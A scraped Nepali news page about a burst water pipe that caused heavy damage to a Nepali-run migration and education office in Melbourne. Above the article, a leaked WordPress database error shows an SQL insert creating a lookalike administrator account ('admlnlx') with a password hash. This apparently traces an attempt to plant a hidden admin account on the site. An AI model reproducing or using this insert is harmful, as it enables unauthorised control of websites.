WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx06NLtGfvunPORMNeKmjG72idQ/An1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 02:23:07', '', 'admlnlx', 'admlnlx')
मेलबर्न, माघ ५ –
अष्ट्रेलियाको मेलबर्नमा अवस्थित नेपालीद्धारा सञ्चालित टीडब्लुजीजी माइग्रेसन तथा एजुकेसनको कार्यालय भवनमा पानी चुहिदा ठूलो क्षति भएको छ ।
इन्सुरेन्स कभर वाहेक पनि झण्डै एक करोड रुपैयाँ वरावरको क्षति भएको प्रबन्धक सागर शर्माले बताउँनुभयो ।
आइतवार बेलुकी पानी चुहिएर उक्त दुर्घट्ना भएको हो । ‘भवनको माथिल्लो तल्लामा रहेको पानीको हट पाइप फुटेर उक्त दुर्घट्ना भएको हो’,शर्माले बताउँनुभयो । पानीका कारण प्रत्यक्ष र अप्रत्यक्ष रुपमा गरि झण्डै एक करोड रुपैयाँको क्षति भएको अनुमान गरिएको छ ।
तर कार्यालयभित्र रहेका सबै कागजात र डकुमेन्टस्हरु भने सुरक्षित रहेको शर्माले जानकारी दिनुभयो । भवनको प्रवन्धकले दुई चार दिन अझै काम नगर्ने भनिएपनि टिडब्लुजीजीको अनुरोधमा आधारभूत मर्मत सम्भार गरि सानो स्थानबाट भए पनि मंगलवारबाटै कार्यालय सञ्चालनमा ल्याइएको उहाँले बताउँनुभयो ।
‘यस्तो विषम अवस्थामा सहयोग र सहानुभूति दर्शाउने सबै शुभचिन्तकहरुप्रति हामी आभार छौं’,शर्माले भन्नुभयो ।